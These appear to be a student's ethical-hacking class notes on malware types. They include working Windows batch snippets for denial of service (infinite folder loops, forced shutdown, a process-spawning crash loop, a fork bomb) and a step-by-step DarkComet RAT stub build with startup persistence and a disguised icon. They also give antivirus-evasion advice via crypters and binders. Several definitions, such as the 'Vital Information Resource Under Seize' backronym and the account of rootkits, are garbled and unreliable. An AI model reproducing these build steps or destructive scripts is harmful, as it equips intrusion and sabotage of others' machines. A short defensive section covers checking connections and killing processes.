  1. MALWARES
  2. =========
  3. The term MALWARE derives from "MAL+WARES" which means Malicious Software.
  4. Malwares are the programs, tools, codes or programs that can affect your computer system with or without your permission and can harm you in any way as they want. They can be in any format whether in the form of image , video , executable file, text file etc.
  5.
  6. IMPACT OF MALWARES
  7. ==================
  8.
  9. = It can steal your data
  10. = Can consume your resources such as Processor, RAM , Harddrive space etc.
  11. = It can do identity theft
  12. = Can take REmote control of your machine
  13. = Can steal your money and confidential data and destroy your machine
  14. = Can create junks of file and fill your Machine etc.
  15.
  16. TYPES OF MALWARES
  17. =================
  18.
  19. 1. Viruses
  20. 2. Worms
  21. 3. TRojans
  22. 4. Ransomwares
  23. 5. Adwares
  24. 6. Spywares
  25. 6.1 Keyloggers
  26. 7. Botnets
  27. 8. Rootkits
  28.
  29.
  30. 1. VIRUS
  31. ========
  32. VIRUS stands for "Vital Information Resource Under Seize"
  33. THese are the implanted codes or programs which needs human assistance to initiate or execute so that they can get triggered on a particular machine. THey can't be replicated without any human assisstance.
  34.
  35. Types
  36. =====
  37. 1. Boot Sector Viruses : These are those which are implemented in the BIOS or Boot menu of the machine.
  38.
  39.
  40. 2. Directed Viruses : THey just get initiated with the help of self executable codes.
  41.
  42. 3. PolyMOrphic Viruses : These are the viruses which changes its signature every time when they are executed.

  45.
  46. BATCH FILE VIRUS CREATION
  47. =========================
  48. = which will create a folder
  49.
  50. mkdir hacked
  51.
  52. = create a folder inside a folder---- infinite times
  53.
  54. :loop
  55. mkdir hacked
  56. cd hacked
  57. goto loop
  58.
  59. = To Create infinite folder with different name
  60. :loop
  61. mkdir %random%
  62. goto loop
  63.
  64. = To Create a file
  65. echo "hi, you are hacked?">>hack.txt
  66.
  67. = Shut Down Virus
  68. shutdown -s -t 10 -c "Hacked By BITIAN =Hackers"
  69.
  70. = To make system Crash
  71. :loop
  72. run cmd.exe
  73. run notepad.exe
  74. start calc.exe
  75. start explorer.exe
  76. goto loop
  77.
  78. = Fork Bomb
  79. %0|%0
  80.
  81. 2. WORMS
  82. ========
  83. Worms are those malicious softwares which replicates into a network withoout any human assisstance. If a attacker is connected to a network and he/she ececutes the worm in his/her own machine it will start its working by replicating.
  84. EG. Stuxnet , Conficker worm
  85.
  86.
  87. 3.TROJANS
  88. =======
  89. Trojans are the malicious applications or programs which looks like a normal application but is harmful in nature as it can give the whole remote access of the Target's Machine to the Attacker's Machine.
  90.
  91. TYPES OF TROJANS ON THE BASIS OF CONNECTION
  92. ===========================================
  93.
  94. Reverse Connection Trojan : A reverse connection trojan is that in which we don't have to get or know the IP Address of the Victim's Machine. You just have to create a trojan having the Attacker's IP Address only.
  95.
  96. ----------------------------------------------------------
  97.
  98. DEPLOYING OF TROJAN IN THE TARGET'S MACHINE
  99. ===========================================
  100.
  101. 1. DEPLOYING IN THE SAME NETWORK : The attacker just have to create a Trojan of the IP in the same network where a Target is residing.
  102.
  103. 2. DEPLOYING TROJAN GLOBALLY : In this Scenario, a Attacker is using a Globally hosted DNS with a global IP to get a reverse connection from a Target to itself. For eg. Using NOIP and Port Forwarding.
  104.
  105. ----------------------------------------------------------
  106.
  107. RAT
  108. ===
  109. RAT stands for Remote Administration Tool. It helps in creating Malwares like Trojans and Viruses which provides Remote Connection of a Victim Machine while not letting know the Victim about it.
  110.
  111. ----------------------------------------------------------
  112.
  113. CREATION OF TROJANS
  114. ===================
  115.
  116. = IP + PORT = Socket
  117. = Stub = The Malicious Trojan we make through Dark Comet.
  118.
  119. 1. Left top corner = DarkComet-RAT
  120. 2. Go to "Server Module" = Full Editor(expert)
  121. 3. Main Settings = Process Mutex
  122. Mutex = Thread which helps me in sharing the computer's resources
  123. Random Process Mutex
  124. Server ID = Same|Change
  125. Profile Name = Same|Change
  126. 4. Goto Network Setting
  127. Insert Private IP Address and a port number(greater than 1200)
  128. Socket = IP Address + Port Number
  129. IP Address = Private IP Address --> 192.168.0.28
  130. Port Number = 1604
  131. CLick On "ADD"
  132. 5. Goto "Module Startup" = When my computer start, then what are the things which my trojan will do.
  133. Check box the "Start the stub with windows"
  134. Drop the stub in:
  135. 6. Goto Install Message
  136. Tick the check box
  137. Choose the icon
  138. Enter the you want the user to display
  139. 7. Goto Module Shield
  140. 8. File Icon
  141. Choose any file icon from the list.
  142. 9. Goto Stub Finalisation
  143. Build This Stub
  144. Destination for saving the stubb
  145. 10. To listen on a specific port
  146. port = 1604
  147. In the dark comet screen, top left corner = DarkComet-RAT = Click on that
  148. Click on "Listen to new port"
  149. enter the port number = 1604 and click on listen
  150.
  151.
  152. EVADING ANTIVIRUSES AND ANTIMALWARES
  153. ====================================
  154.
  155. HOW ANTIVIRUSES WORKS
  156. =====================
  157. Antiviruses and Antimalwares works on the definations or ccalled signatures of an application. If they found that a Signature of a Application is malicious, they will declare the application as a malware and if not they will declare it as a normal running application.

  161. FUD - Fully Undetectable
  162.
  163.
  164. CRYPTERS AND BINDERS
  165. ====================
  166. Crypters are cthose applications which helps as a extra coating layer to an application providing there own self generated "Signatures". Eg. CHrome Crypter, Urge Crypter
  167.
  168. Binders are those applications which binds a file or a malware in any extension while not changing the functionality of the filetype.
  169.
  170. Chrome & Urge Crypters = Limbo > Bingo
  171.
  172. ----------------------------------------------------------
  173.
  174. BOTNETS AND ROOTKITS
  175. ====================
  176.
  177. Botnets means roBOT+NETwork. THese are the malicious applications such as TRojans etc.. which runs on the Network and are intelligent enough to use there own mechanism.
  178.
  179. Rootkits
  180. ========
  181. Rootkits are those Malicious Applications or Codes which are installed in the Boot option such as BIOS and start executing on every startup.
  182.
  183. ---------------------------------------------------------
  184.
  185. SECURE SYSTEM CONFIGURATION
  186. ===========================
  187.
  188. 1. CMD > $ netstat -ona
  189. (This will show all the Sockets : IP+Port Connections with their Stats of that particular machine)
  190. = o stands for ports
  191. = n stands for network IPs
  192. = a stands for all connections
  193.
  194. 2. CMD > tasklist
  195. CMD > $ taskkill /PID ___ /F
  196.
  197. 3. Startups Check and Maintaining the list of the Machine.
  198.
  199. 4. Task Manager > Processes > kill PID (Process ID) of the Malicious Executable(exe)
  200.
  201. 5. Checking Firewall status and making and creating new Rules Sets. > Outbound Rules & Inbound Rules
  202.
  203. 6. Services running on the Machine.
  204.
  205.
  206. TASKS
  207. =====
  208.
  209. 1. Create a POC by making a Stub and getting the Remote Connection of a Machine.
  210. 2. Report on the World's First Antivirus.
  211. 3. Find an application which can see the "Established" and "Listening" connection of a machine just like "netstat".
